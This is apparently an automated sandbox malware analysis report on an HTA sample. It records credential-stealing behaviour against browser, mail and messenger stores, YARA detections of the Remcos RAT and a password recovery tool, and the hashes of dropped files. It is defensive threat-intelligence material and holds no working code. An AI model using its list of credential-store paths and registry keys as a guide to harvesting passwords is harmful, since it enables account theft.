Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\SysWOW64\recover.exe	Code function: ESMTPPassword	10_2_004033F0
Source: C:\Windows\SysWOW64\recover.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword	10_2_00402DB3
Source: C:\Windows\SysWOW64\recover.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword	10_2_00402DB3

Yara detected WebBrowserPassView password recovery tool

Source: Yara match	File source: 8.2.CasPol.exe.4540000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.recover.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.CasPol.exe.4540000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.recover.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3469653795.0000000004540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1150649991.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 5748, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: recover.exe PID: 5648, type: MEMORYSTR

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match	File source: 8.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.6424cd0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.6424cd0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3466361375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3467761348.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1081213353.0000000006382000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 5748, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\jasgbtisot.dat, type: DROPPED

Contains functionality to launch a control a shell (cmd.exe)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: cmd.exe

8_2_00405091

Windows Analysis Report
creatingbestthingsforhisbeststepstotakehim.hta

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

ID:	1649128
Product:	CloudBasic
Start time:	15:27:00
Start date:	26.03.2025
Sample:	creatingbestthingsforhisbeststepstotakehim.hta
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	287ddf351810cc030f2eca5307052023
SHA1:	abb6b50f27d0830aa932a21c038a132bc3a34242
SHA256:	64a04162d4e39030d2bcf514422cac3b97c52fc5f5560389ebba76dc069fe126
Filetype:	HyperText Markup Language (15015/1) 38.98%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Network\Downloader\edb.chk	data	D6D3830984AEC72B32E4EF5030B32290	A645195729EB557B4B773E137AA78ECB17CFB96D	09BA30C4D4F2F7FEC3C62A7AD0D5103CE6662FDAB91F62803144CCB6B20E4604
C:\ProgramData\Microsoft\Network\Downloader\edb.log	data	56759E69CABBC8A556148A3518732DB1	163874145C67458A9CAC09CA1FF9E9423E4C7B2B	B92D40F4E8432086A3F5670B11539F5DA39BA98CF89AF422F82E2A10170E9DF9
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db	Extensible storage engine DataBase, version 0x620, checksum 0x0400d571, page size 16384, Windows version 10.0	006969F87640F6AF8882A075B098E695	8B5EBB7DCA83A4B3CCFFC1891387DC19C266FB82	8F503A30E5534B261E69ED403BBEFA389357A28BA9A80C006098CC8C10DDD6A7
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm	data	43015974E476FA44E2DE4EE8EB45799E	EE59EBCF4784582F4F74282652B6BFC67E064166	B81C8B335FAAD1C0559AE9952FB207C80DAD1FB9530BBDDBA7ABE671CEC7F737
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\json[1].json	JSON data	F01F493D8825B8B8A128C847A54F9B60	C8CC91F6D3E478F19AC0EF04622E311F936B322F	6370B39800AA022450056B0AA36C364C275768B8923023D657512F075BE8015B
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\0[1].txt	Unicode text, UTF-8 text, with very long lines (22523), with CRLF line terminators	084435B0484D31F9DF0FB6246E2F95FE	817CE5AE2FA67C88B89D33492B1E17337CDD55D8	17E63DEDFDD480A4B0A5FB8DCF90B77A9A7F1ECA34439996C1774E25BEED7CDD
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	C08C32D74EF385C48ABB2F518FF27783	89D488B137F94BF65836D94AE3CA215832A97FAC	7E7BF8D1367D62AAB955DE0F78A54104373ECFDAEACE9528052F97FB506727BF
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3s24tbxd.fpq.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_emipnk2l.mr3.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\bhv90B.tmp	Extensible storage engine DataBase, version 0x620, checksum 0xd2efc739, page size 32768, DirtyShutdown, Windows version 10.0	38C06514A76AD05C3EF5F487CF392C37	71D8E8F08A93E82925A5C74BB3D51140A6B736BF	8DF940165CA98302531C908FA6DE67F6A9540575912EAEE5E0D1F9DCCEDE4EDF
C:\Users\user\AppData\Local\Temp\kpsctizepnmfbmfnkvavzvmxchsqhsjyz	Unicode text, UTF-16, little-endian text, with no line terminators	F3B25701FE362EC84616A93A45CE9998	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
C:\Users\user\AppData\Roaming\jasgbtisot.dat	data	E59F56D3D4985B0A62872922C22A9A04	02CC8D460F92417D34E445E284614AC0DF9D17DA	F96C6252D94537C3A1C4F0BDFA2822D48F834ED221E0D37C7CBE6606EC4FAC76
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	JSON data	DCA83F08D448911A14C22EBCACC5AD57	91270525521B7FE0D986DB19747F47D34B6318AD	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
C:\Windows\Temp\Sheena.vbs	ASCII text, with CRLF line terminators	216069FDB3767D943F97AF1069B62C10	92552F5F443DAF42B7566AE1F4A4D2FDEE2227A5	29E16ADB94C6A9082EA99326D3B6B6A11C1243DF9B20E54EFE715AFD9B3D2ACC
C:\Windows\Temp\anonymiser.bat	DOS batch file, ASCII text, with CRLF line terminators	A7CCE8808B5E5124EB583E09F6B1794D	969A481CC2C506767A48F4DDA51B65B09F14D043	49929CF568DA423BCF4853230418C9A51A9E97B89200C8B2AA114C346075D2D8
\Device\Null	ASCII text, with CRLF line terminators, with overstriking	5BFD4A973BE54A8EBC2A7F79CFCF4B6C	071E9887A3B0E5500EC2116564E4DF0962946CB6	BBDCFB24BDD6DE329D8616497FE5F0C7F4644A484B825632339127F6E2CCA843

Windows Analysis Report creatingbestthingsforhisbeststepstotakehim.hta

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
creatingbestthingsforhisbeststepstotakehim.hta

Malware Threat Intel
Provided by